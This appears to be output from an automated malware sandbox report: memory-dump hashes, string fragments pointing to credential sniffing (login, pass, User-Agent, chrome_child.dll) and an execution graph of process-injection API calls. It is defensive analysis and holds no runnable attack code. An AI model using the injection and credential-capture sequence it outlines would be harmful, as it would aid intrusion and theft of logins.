                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: $Snif$f fr$om:
                                                                                                                                                                          • API String ID: 0-3434893486
                                                                                                                                                                          • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                          • Instruction ID: 0b8eb6b65e463a979226d72fb74fa95ae1109baa87835990552d45faa20660eb
                                                                                                                                                                          • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                                                                                                                                                          • Instruction Fuzzy Hash: 1F3105B550CB886FC71ADB28C0856EAB7D0FB84300F50491EE49BCB295EE34A549CB43
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: $Snif$f fr$om:
                                                                                                                                                                          • API String ID: 0-3434893486
                                                                                                                                                                          • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                          • Instruction ID: 5f8fd6810ed46b1118697ec43fe7822016274817084940dcab5efc432483c5be
                                                                                                                                                                          • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                                                                                                                                                          • Instruction Fuzzy Hash: 5D31F2B5508B486FD76ADB28C4856EAB7D4FB94300F40491EE49BCB295EE30E506CA43
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: .dll$chro$hild$me_c
                                                                                                                                                                          • API String ID: 0-3136806129
                                                                                                                                                                          • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                          • Instruction ID: 77b22e6cd96b72b979039a77d01aead3e3a84e527a6ec71c1c34c8edf209be95
                                                                                                                                                                          • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                                                                                                                                                          • Instruction Fuzzy Hash: 85319074118B084FC784DF689495BAAB7E1FB98301FC5553DA44ACB294DF30D905CB62
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: .dll$chro$hild$me_c
                                                                                                                                                                          • API String ID: 0-3136806129
                                                                                                                                                                          • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                          • Instruction ID: b1312e31ab74149379e0d2e2a4cbde5843c6f7fefe185bbf87464b84e37808e6
                                                                                                                                                                          • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                                                                                                                                                          • Instruction Fuzzy Hash: 4831AD70218B088FC784DF689495BAAB7E1FF98301F85563DA44ACB294DF30D905CBA2
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                          • API String ID: 0-319646191
                                                                                                                                                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                          • Instruction ID: 6bd718b0a5f4d29cccc4e1b2b8ef88a483b45992e0600eb1bc84e5470455e1a6
                                                                                                                                                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                                                          • Instruction Fuzzy Hash: 8631D171614A0C8FCB45EFA8C8857EDBBE0FB58215F40422AE44EDB280DE789645CB99
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                          • API String ID: 0-319646191
                                                                                                                                                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                          • Instruction ID: e798a7ce9c8e9bcdcc4a2466b1886035a1411d42cba1a3a6f70c7b88d8bcfa60
                                                                                                                                                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                          • Instruction Fuzzy Hash: DA2106B0610A4C8FCB05DFA8C8457ED7BF0FF58215F40422AE45ADB280DF749604CBA9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: .$l$l$t
                                                                                                                                                                          • API String ID: 0-168566397
                                                                                                                                                                          • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                          • Instruction ID: ad3a4630106d556fee91601dcef2859fa39a8d18cfefc39a5bb63182908e63c3
                                                                                                                                                                          • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                          • Instruction Fuzzy Hash: 0321ADB4A24E0E9FDB48EFA8D0447ADBAF0FF18311F50462EE009E7640DB74A581CB94
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: .$l$l$t
                                                                                                                                                                          • API String ID: 0-168566397
                                                                                                                                                                          • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                          • Instruction ID: 2e1b94306d2b488c4fc830a9a69698d487c372dbac974594d0ad5d2676609ab7
                                                                                                                                                                          • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                          • Instruction Fuzzy Hash: 61219CB4A24E0D9BDB18EFA8D0457E9BBF0FF08311F50462DE009E7640DB74A5818B94
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000004.00000002.4565128715.0000000010C90000.00000040.00000001.00040000.00000000.sdmp, Offset: 10C90000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_4_2_10c90000_explorer.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: auth$logi$pass$user
                                                                                                                                                                          • API String ID: 0-2393853802
                                                                                                                                                                          • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                          • Instruction ID: d593b78aaf1509edb9dde591c69be91393d8926173c0f0fbe9ab09e43764aa79
                                                                                                                                                                          • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                          • Instruction Fuzzy Hash: BF21CDB0614B0D8BCB45CF9998816EEB7E1FF88344F054619E40AEB244D7B0E915CBD6

                                                                                                                                                                          Execution Graph

                                                                                                                                                                          Execution Coverage:1.8%
                                                                                                                                                                          Dynamic/Decrypted Code Coverage:6.6%
                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                          Total number of Nodes:633
                                                                                                                                                                          Total number of Limit Nodes:82
                                                                                                                                                                          execution_graph 101703 476cb84 101706 476a042 101703->101706 101705 476cba5 101708 476a06b 101706->101708 101707 476a56c 101707->101705 101708->101707 101709 476a182 NtQueryInformationProcess 101708->101709 101711 476a1ba 101709->101711 101710 476a1ef 101710->101705 101711->101710 101712 476a290 101711->101712 101713 476a2db 101711->101713 101735 4769de2 NtCreateSection NtMapViewOfSection NtClose 101712->101735 101714 476a2fc NtSuspendThread 101713->101714 101716 476a30d 101714->101716 101718 476a331 101714->101718 101716->101705 101717 476a2cf 101717->101705 101721 476a412 101718->101721 101726 4769bb2 101718->101726 101720 476a531 101723 476a552 NtResumeThread 101720->101723 101721->101720 101722 476a4a6 NtSetContextThread 101721->101722 101725 476a4bd 101722->101725 101723->101707 101724 476a51c NtQueueApcThread 101724->101720 101725->101720 101725->101724 101727 4769bf7 101726->101727 101728 4769c66 NtCreateSection 101727->101728 101729 4769ca0 101728->101729 101730 4769d4e 101728->101730 101731 4769cc1 NtMapViewOfSection 101729->101731 101730->101721 101731->101730 101732 4769d0c 101731->101732 101732->101730 101733 4769d88 101732->101733 101734 4769dc5 NtClose 101733->101734 101734->101721 101735->101717 101736 288f03d 101739 288b9c0 101736->101739 101740 288b9e6 101739->101740 101747 2879d30 101740->101747 101742 288b9f2 101743 288ba16 101742->101743 101755 2878f30 101742->101755 101793 288a6a0 101743->101793 101796 2879c80 101747->101796 101749 2879d3d 101750 2879d44 101749->101750 101808 2879c20 101749->101808 101750->101742 101756 2878f57 101755->101756 102240 287b1b0 101756->102240 101758 2878f69 102244 287af00 101758->102244 101760 2878f86 101767 2878f8d 101760->101767 102315 287ae30 LdrLoadDll 101760->102315 101762 28790f2 101762->101743 101764 2878ffc 102260 287f400 101764->102260 101766 2879006 101766->101762 101768 288bf80 2 API calls 101766->101768 101767->101762 102248 287f370 101767->102248 101769 287902a 101768->101769 101770 288bf80 2 API calls 101769->101770 101771 287903b 101770->101771 101772 288bf80 2 API calls 101771->101772 101773 287904c 101772->101773 102272 287ca80 101773->102272 101775 2879059 101776 2884a40 8 API calls 101775->101776 101777 2879066 101776->101777 101778 2884a40 8 API calls 101777->101778 101779 2879077 101778->101779 101780 28790a5 101779->101780 101781 2879084 101779->101781 101782 2884a40 8 API calls 101780->101782 102282 287d610 101781->102282 101789 28790c1 101782->101789 101785 28790e9 101787 2878d00 23 API calls 101785->101787 101787->101762 101788 2879092 102298 2878d00 101788->102298 101789->101785 102316 287d6b0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 101789->102316 101794 288a6bf 101793->101794 101795 288af50 LdrLoadDll 101793->101795 101795->101794 101827 2888bb0 101796->101827 101800 2879ca6 101800->101749 101801 2879c9c 101801->101800 101834 288b2a0 101801->101834 101803 2879ce3 101803->101800 101845 2879aa0 101803->101845 101805 2879d03 101851 2879620 LdrLoadDll 101805->101851 101807 2879d15 101807->101749 102215 288b590 101808->102215 101811 288b590 LdrLoadDll 101812 2879c4b 101811->101812 101813 288b590 LdrLoadDll 101812->101813 101814 2879c61 101813->101814 101815 287f170 101814->101815 101816 287f189 101815->101816 102223 287b030 101816->102223 101818 287f19c 102227 288a1d0 101818->102227 101821 2879d55 101821->101742 101823 287f1c2 101824 287f1ed 101823->101824 102233 288a250 101823->102233 101826 288a480 2 API calls 101824->101826 101826->101821 101828 2888bbf 101827->101828 101852 2884e40 101828->101852 101830 2879c93 101831 2888a60 101830->101831 101858 288a5f0 101831->101858 101835 288b2b9 101834->101835 101865 2884a40 101835->101865 101837 288b2d1 101838 288b2da 101837->101838 101904 288b0e0 101837->101904 101838->101803 101840 288b2ee 101840->101838 101926 2889ef0 101840->101926 101848 2879aba 101845->101848 102193 2877ea0 101845->102193 101847 2879ac1 101847->101805 101848->101847 102206 2878160 101848->102206 101851->101807 101853 2884e4e 101852->101853 101854 2884e5a 101852->101854 101853->101854 101857 28852c0 LdrLoadDll 101853->101857 101854->101830 101856 2884fac 101856->101830 101857->101856 101859 2888a75 101858->101859 101861 288af50 101858->101861 101859->101801 101862 288af51 101861->101862 101863 2884e40 LdrLoadDll 101862->101863 101864 288af82 101862->101864 101863->101864 101864->101859 101866 2884a54 101865->101866 101867 2884d75 101865->101867 101866->101867 101934 2889c40 101866->101934 101867->101837 101870 2884b80 101937 288a350 101870->101937 101871 2884b63 101994 288a450 LdrLoadDll 101871->101994 101874 2884ba7 101876 288bdb0 2 API calls 101874->101876 101875 2884b6d 101875->101837 101878 2884bb3 101876->101878 101877 2884d39 101880 288a480 2 API calls 101877->101880 101878->101875 101878->101877 101879 2884d4f 101878->101879 101884 2884c42 101878->101884 102003 2884780 LdrLoadDll NtReadFile NtClose 101879->102003 101881 2884d40 101880->101881 101881->101837 101883 2884d62 101883->101837 101885 2884ca9 101884->101885 101887 2884c51 101884->101887 101885->101877 101886 2884cbc 101885->101886 101996 288a2d0 101886->101996 101889 2884c6a 101887->101889 101890 2884c56 101887->101890 101893 2884c6f 101889->101893 101894 2884c87 101889->101894 101995 2884640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 101890->101995 101940 28846e0 101893->101940 101894->101881 101952 2884400 101894->101952 101896 2884c60 101896->101837 101898 2884d1c 102000 288a480 101898->102000 101899 2884c7d 101899->101837 101901 2884c9f 101901->101837 101903 2884d28 101903->101837 101905 288b0f1 101904->101905 101906 288b103 101905->101906 102021 288bd30 101905->102021 101906->101840 101908 288b124 102024 2884060 101908->102024 101910 288b170 101910->101840 101911 288b147 101911->101910 101912 2884060 3 API calls 101911->101912 101913 288b169 101912->101913 101913->101910 102058 288bb30 101913->102058 101915 288b186 102063 2885380 101915->102063 101917 288b20a 102073 288b060 101917->102073 101918 288b1fa 101918->101917 102160 288aef0 LdrLoadDll 101918->102160 101921 288b22e 102076 288ad60 101921->102076 101923 288b238 102155 2889eb0 101923->102155 101927 2889f0c 101926->101927 101928 288af50 LdrLoadDll 101926->101928 102187 48d2c0a 101927->102187 101928->101927 101929 2889f27 101931 288bdb0 101929->101931 102190 288a660 101931->102190 101933 288b349 101933->101803 101935 2884b34 101934->101935 101936 288af50 LdrLoadDll 101934->101936 101935->101870 101935->101871 101935->101875 101936->101935 101938 288a36c NtCreateFile 101937->101938 101939 288af50 LdrLoadDll 101937->101939 101938->101874 101939->101938 101941 28846fc 101940->101941 101942 288a2d0 LdrLoadDll 101941->101942 101943 288471d 101942->101943 101944 2884738 101943->101944 101945 2884724 101943->101945 101946 288a480 2 API calls 101944->101946 101947 288a480 2 API calls 101945->101947 101948 2884741 101946->101948 101949 288472d 101947->101949 102004 288bfc0 LdrLoadDll RtlAllocateHeap 101948->102004 101949->101899 101951 288474c 101951->101899 101953 288444b 101952->101953 101954 288447e 101952->101954 101955 288a2d0 LdrLoadDll 101953->101955 101956 28845c9 101954->101956 101960 288449a 101954->101960 101958 2884466 101955->101958 101957 288a2d0 LdrLoadDll 101956->101957 101964 28845e4 101957->101964 101959 288a480 2 API calls 101958->101959 101961 288446f 101959->101961 101962 288a2d0 LdrLoadDll 101960->101962 101961->101901 101963 28844b5 101962->101963 101965 28844bc 101963->101965 101966 28844d1 101963->101966 102017 288a310 LdrLoadDll 101964->102017 101968 288a480 2 API calls 101965->101968 101969 28844ec 101966->101969 101970 28844d6 101966->101970 101973 28844c5 101968->101973 101980 28844f1 101969->101980 102005 288bf80 101969->102005 101971 288a480 2 API calls 101970->101971 101974 28844df 101971->101974 101972 288461e 101976 288a480 2 API calls 101972->101976 101973->101901 101974->101901 101975 2884503 101975->101901 101977 2884629 101976->101977 101977->101901 101980->101975 102008 288a400 101980->102008 101981 2884557 101982 288456e 101981->101982 102016 288a290 LdrLoadDll 101981->102016 101984 288458a 101982->101984 101985 2884575 101982->101985 101987 288a480 2 API calls 101984->101987 101986 288a480 2 API calls 101985->101986 101986->101975 101988 2884593 101987->101988 101989 28845bf 101988->101989 102011 288bb80 101988->102011 101989->101901 101991 28845aa 101992 288bdb0 2 API calls 101991->101992 101993 28845b3 101992->101993 101993->101901 101994->101875 101995->101896 101997 2884d04 101996->101997 101998 288af50 LdrLoadDll 101996->101998 101999 288a310 LdrLoadDll 101997->101999 101998->101997 101999->101898 102001 288af50 LdrLoadDll 102000->102001 102002 288a49c NtClose 102001->102002 102002->101903 102003->101883 102004->101951 102018 288a620 102005->102018 102007 288bf98 102007->101980 102009 288a41c NtReadFile 102008->102009 102010 288af50 LdrLoadDll 102008->102010 102009->101981 102010->102009 102013 288bb86 102011->102013 102012 288bba4 102012->101991 102013->102012 102014 288bf80 2 API calls 102013->102014 102015 288bbbb 102014->102015 102015->101991 102016->101982 102017->101972 102019 288af50 LdrLoadDll 102018->102019 102020 288a63c RtlAllocateHeap 102019->102020 102020->102007 102022 288bd5d 102021->102022 102161 288a530 102021->102161 102022->101908 102025 2884079 102024->102025 102026 2884071 102024->102026 102027 288bb30 2 API calls 102025->102027 102026->101911 102028 2884083 102027->102028 102057 288434c 102028->102057 102164 288cf20 102028->102164 102030 28840cd 102031 288cf20 2 API calls 102030->102031 102035 28840d8 102031->102035 102032 2884126 102034 288cf20 2 API calls 102032->102034 102038 288413a 102034->102038 102035->102032 102172 288cfc0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 102035->102172 102173 288d050 102035->102173 102037 2884197 102039 288cf20 2 API calls 102037->102039 102038->102037 102040 288d050 3 API calls 102038->102040 102041 28841ad 102039->102041 102040->102038 102042 28841ea 102041->102042 102044 288d050 3 API calls 102041->102044 102043 288cf20 2 API calls 102042->102043 102045 28841f5 102043->102045 102044->102041 102046 288d050 3 API calls 102045->102046 102052 288422f 102045->102052 102046->102045 102049 288cf80 2 API calls 102050 288432e 102049->102050 102051 288cf80 2 API calls 102050->102051 102053 2884338 102051->102053 102169 288cf80 102052->102169 102054 288cf80 2 API calls 102053->102054 102055 2884342 102054->102055 102056 288cf80 2 API calls 102055->102056 102056->102057 102057->101911 102059 288bb3a 102058->102059 102059->101915 102060 288bb54 102059->102060 102061 288bf80 2 API calls 102059->102061 102060->101915 102062 288bbbb 102061->102062 102062->101915 102064 2885391 102063->102064 102065 2884a40 8 API calls 102064->102065 102067 28853a7 102065->102067 102066 28853fa 102066->101918 102067->102066 102068 28853e2 102067->102068 102069 28853f5 102067->102069 102070 288bdb0 2 API calls 102068->102070 102071 288bdb0 2 API calls 102069->102071 102072 28853e7 102070->102072 102071->102066 102072->101918 102074 288bb30 2 API calls 102073->102074 102075 288b074 102074->102075 102075->101921 102077 288ad74 102076->102077 102078 288ac20 2 API calls 102076->102078 102179 288ac20 102077->102179 102078->102077 102081 288ac20 2 API calls 102082 288ad86 102081->102082 102083 288ac20 2 API calls 102082->102083 102084 288ad8f 102083->102084 102085 288ac20 2 API calls 102084->102085 102086 288ad98 102085->102086 102087 288ac20 2 API calls 102086->102087 102088 288ada1 102087->102088 102089 288ac20 2 API calls 102088->102089 102090 288adad 102089->102090 102091 288ac20 2 API calls 102090->102091 102092 288adb6 102091->102092 102093 288ac20 2 API calls 102092->102093 102094 288adbf 102093->102094 102095 288ac20 2 API calls 102094->102095 102096 288adc8 102095->102096 102097 288ac20 2 API calls 102096->102097 102098 288add1 102097->102098 102099 288ac20 2 API calls 102098->102099 102100 288adda 102099->102100 102101 288ac20 2 API calls 102100->102101 102102 288ade6 102101->102102 102103 288ac20 2 API calls 102102->102103 102104 288adef 102103->102104 102105 288ac20 2 API calls 102104->102105 102106 288adf8 102105->102106 102107 288ac20 2 API calls 102106->102107 102108 288ae01 102107->102108 102109 288ac20 2 API calls 102108->102109 102110 288ae0a 102109->102110 102111 288ac20 2 API calls 102110->102111 102112 288ae13 102111->102112 102113 288ac20 2 API calls 102112->102113 102114 288ae1f 102113->102114 102115 288ac20 2 API calls 102114->102115 102116 288ae28 102115->102116 102117 288ac20 2 API calls 102116->102117 102118 288ae31 102117->102118 102119 288ac20 2 API calls 102118->102119 102120 288ae3a 102119->102120 102121 288ac20 2 API calls 102120->102121 102122 288ae43 102121->102122 102123 288ac20 2 API calls 102122->102123 102124 288ae4c 102123->102124 102125 288ac20 2 API calls 102124->102125 102126 288ae58 102125->102126 102127 288ac20 2 API calls 102126->102127 102128 288ae61 102127->102128 102129 288ac20 2 API calls 102128->102129 102130 288ae6a 102129->102130 102131 288ac20 2 API calls 102130->102131 102132 288ae73 102131->102132 102133 288ac20 2 API calls 102132->102133 102134 288ae7c 102133->102134 102135 288ac20 2 API calls 102134->102135 102136 288ae85 102135->102136 102137 288ac20 2 API calls 102136->102137 102138 288ae91 102137->102138 102139 288ac20 2 API calls 102138->102139 102140 288ae9a 102139->102140 102141 288ac20 2 API calls 102140->102141 102142 288aea3 102141->102142 102143 288ac20 2 API calls 102142->102143 102144 288aeac 102143->102144 102145 288ac20 2 API calls 102144->102145 102146 288aeb5 102145->102146 102147 288ac20 2 API calls 102146->102147 102148 288aebe 102147->102148 102149 288ac20 2 API calls 102148->102149 102150 288aeca 102149->102150 102151 288ac20 2 API calls 102150->102151 102152 288aed3 102151->102152 102153 288ac20 2 API calls 102152->102153 102154 288aedc 102153->102154 102154->101923 102156 288af50 LdrLoadDll 102155->102156 102157 2889ecc 102156->102157 102186 48d2df0 LdrInitializeThunk 102157->102186 102158 2889ee3 102158->101840 102160->101917 102162 288a54c NtAllocateVirtualMemory 102161->102162 102163 288af50 LdrLoadDll 102161->102163 102162->102022 102163->102162 102165 288cf30 102164->102165 102166 288cf36 102164->102166 102165->102030 102167 288bf80 2 API calls 102166->102167 102168 288cf5c 102167->102168 102168->102030 102170 288bdb0 2 API calls 102169->102170 102171 2884324 102170->102171 102171->102049 102172->102035 102174 288cfc0 102173->102174 102175 288bf80 2 API calls 102174->102175 102178 288d01d 102174->102178 102176 288cffa 102175->102176 102177 288bdb0 2 API calls 102176->102177 102177->102178 102178->102035 102180 288ac3b 102179->102180 102181 288bb30 2 API calls 102179->102181 102182 2884e40 LdrLoadDll 102180->102182 102181->102180 102183 288ac5b 102182->102183 102184 2884e40 LdrLoadDll 102183->102184 102185 288ad07 102183->102185 102184->102185 102185->102081 102186->102158 102188 48d2c1f LdrInitializeThunk 102187->102188 102189 48d2c11 102187->102189 102188->101929 102189->101929 102191 288a67c RtlFreeHeap 102190->102191 102192 288af50 LdrLoadDll 102190->102192 102191->101933 102192->102191 102194 2877eb0 102193->102194 102195 2877eab 102193->102195 102196 288bd30 2 API calls 102194->102196 102195->101848 102202 2877ed5 102196->102202 102197 2877f38 102197->101848 102198 2889eb0 2 API calls 102198->102202 102199 2877f3e 102201 2877f64 102199->102201 102203 288a5b0 2 API calls 102199->102203 102201->101848 102202->102197 102202->102198 102202->102199 102204 288bd30 2 API calls 102202->102204 102209 288a5b0 102202->102209 102205 2877f55 102203->102205 102204->102202 102205->101848 102207 288a5b0 2 API calls 102206->102207 102208 287817e 102207->102208 102208->101805 102210 288af50 LdrLoadDll 102209->102210 102211 288a5cc 102210->102211 102212 288a5e3 102211->102212 102214 48d2c70 LdrInitializeThunk 102211->102214 102212->102202 102214->102212 102216 288b5b3 102215->102216 102219 287ace0 102216->102219 102220 287ad04 102219->102220 102221 2879c3a 102220->102221 102222 287ad40 LdrLoadDll 102220->102222 102221->101811 102222->102221 102224 287b053 102223->102224 102226 287b0d0 102224->102226 102238 2889c80 LdrLoadDll 102224->102238 102226->101818 102228 288af50 LdrLoadDll 102227->102228 102229 287f1ab 102228->102229 102229->101821 102230 288a7c0 102229->102230 102231 288a7df LookupPrivilegeValueW 102230->102231 102232 288af50 LdrLoadDll 102230->102232 102231->101823 102232->102231 102234 288a26c 102233->102234 102235 288af50 LdrLoadDll 102233->102235 102239 48d2ea0 LdrInitializeThunk 102234->102239 102235->102234 102236 288a28b 102236->101824 102238->102226 102239->102236 102241 287b1e0 102240->102241 102242 287b030 LdrLoadDll 102241->102242 102243 287b1f4 102242->102243 102243->101758 102245 287af24 102244->102245 102317 2889c80 LdrLoadDll 102245->102317 102247 287af5e 102247->101760 102249 287f39c 102248->102249 102250 287b1b0 LdrLoadDll 102249->102250 102251 287f3ae 102250->102251 102318 287f280 102251->102318 102254 287f3e1 102256 287f3f2 102254->102256 102259 288a480 2 API calls 102254->102259 102255 287f3c9 102257 287f3d4 102255->102257 102258 288a480 2 API calls 102255->102258 102256->101764 102257->101764 102258->102257 102259->102256 102261 287f42c 102260->102261 102337 287b2a0 102261->102337 102263 287f43e 102264 287f280 3 API calls 102263->102264 102265 287f44f 102264->102265 102266 287f471 102265->102266 102267 287f459 102265->102267 102268 287f482 102266->102268 102271 288a480 2 API calls 102266->102271 102269 287f464 102267->102269 102270 288a480 2 API calls 102267->102270 102268->101766 102269->101766 102270->102269 102271->102268 102273 287ca96 102272->102273 102274 287caa0 102272->102274 102273->101775 102275 287af00 LdrLoadDll 102274->102275 102276 287cb3e 102275->102276 102277 287cb64 102276->102277 102278 287b030 LdrLoadDll 102276->102278 102277->101775 102279 287cb80 102278->102279 102280 2884a40 8 API calls 102279->102280 102281 287cbd5 102280->102281 102281->101775 102283 287d636 102282->102283 102284 287b030 LdrLoadDll 102283->102284 102285 287d64a 102284->102285 102341 287d300 102285->102341 102287 287908b 102288 287cbf0 102287->102288 102289 287cc16 102288->102289 102290 287b030 LdrLoadDll 102289->102290 102291 287cc99 102289->102291 102290->102291 102292 287b030 LdrLoadDll 102291->102292 102293 287cd06 102292->102293 102294 287af00 LdrLoadDll 102293->102294 102295 287cd6f 102294->102295 102296 287b030 LdrLoadDll 102295->102296 102297 287ce1f 102296->102297 102297->101788 102370 287f6c0 102298->102370 102300 2878f25 102300->101743 102301 2878d14 102301->102300 102375 2884390 102301->102375 102303 2878d70 102303->102300 102378 2878ab0 102303->102378 102306 288cf20 2 API calls 102307 2878db2 102306->102307 102308 288d050 3 API calls 102307->102308 102312 2878dc7 102308->102312 102309 2877ea0 4 API calls 102309->102312 102312->102300 102312->102309 102313 287c7a0 18 API calls 102312->102313 102314 2878160 2 API calls 102312->102314 102383 287f660 102312->102383 102387 287f070 21 API calls 102312->102387 102313->102312 102314->102312 102315->101767 102316->101785 102317->102247 102319 287f29a 102318->102319 102327 287f350 102318->102327 102320 287b030 LdrLoadDll 102319->102320 102321 287f2bc 102320->102321 102328 2889f30 102321->102328 102323 287f2fe 102331 2889f70 102323->102331 102326 288a480 2 API calls 102326->102327 102327->102254 102327->102255 102329 2889f4c 102328->102329 102330 288af50 LdrLoadDll 102328->102330 102329->102323 102330->102329 102332 288af50 LdrLoadDll 102331->102332 102333 2889f8c 102332->102333 102336 48d35c0 LdrInitializeThunk 102333->102336 102334 287f344 102334->102326 102336->102334 102338 287b2c7 102337->102338 102339 287b030 LdrLoadDll 102338->102339 102340 287b303 102339->102340 102340->102263 102342 287d317 102341->102342 102350 287f700 102342->102350 102346 287d38b 102347 287d392 102346->102347 102361 288a290 LdrLoadDll 102346->102361 102347->102287 102349 287d3a5 102349->102287 102351 287f725 102350->102351 102362 28781a0 102351->102362 102353 287f749 102354 2884a40 8 API calls 102353->102354 102356 287d35f 102353->102356 102357 288bdb0 2 API calls 102353->102357 102369 287f540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 102353->102369 102354->102353 102358 288a6d0 102356->102358 102357->102353 102359 288a6ef CreateProcessInternalW 102358->102359 102360 288af50 LdrLoadDll 102358->102360 102359->102346 102360->102359 102361->102349 102363 287829f 102362->102363 102364 28781b5 102362->102364 102363->102353 102364->102363 102365 2884a40 8 API calls 102364->102365 102366 2878222 102365->102366 102367 288bdb0 2 API calls 102366->102367 102368 2878249 102366->102368 102367->102368 102368->102353 102369->102353 102371 2884e40 LdrLoadDll 102370->102371 102372 287f6df 102371->102372 102373 287f6e6 SetErrorMode 102372->102373 102374 287f6ed 102372->102374 102373->102374 102374->102301 102377 28843b6 102375->102377 102388 287f490 102375->102388 102377->102303 102379 288bd30 2 API calls 102378->102379 102382 2878ad5 102379->102382 102380 2878cea 102380->102306 102382->102380 102407 2889870 102382->102407 102384 287f673 102383->102384 102455 2889e80 102384->102455 102387->102312 102389 287f4ad 102388->102389 102395 2889fb0 102389->102395 102392 287f4f5 102392->102377 102396 288af50 LdrLoadDll 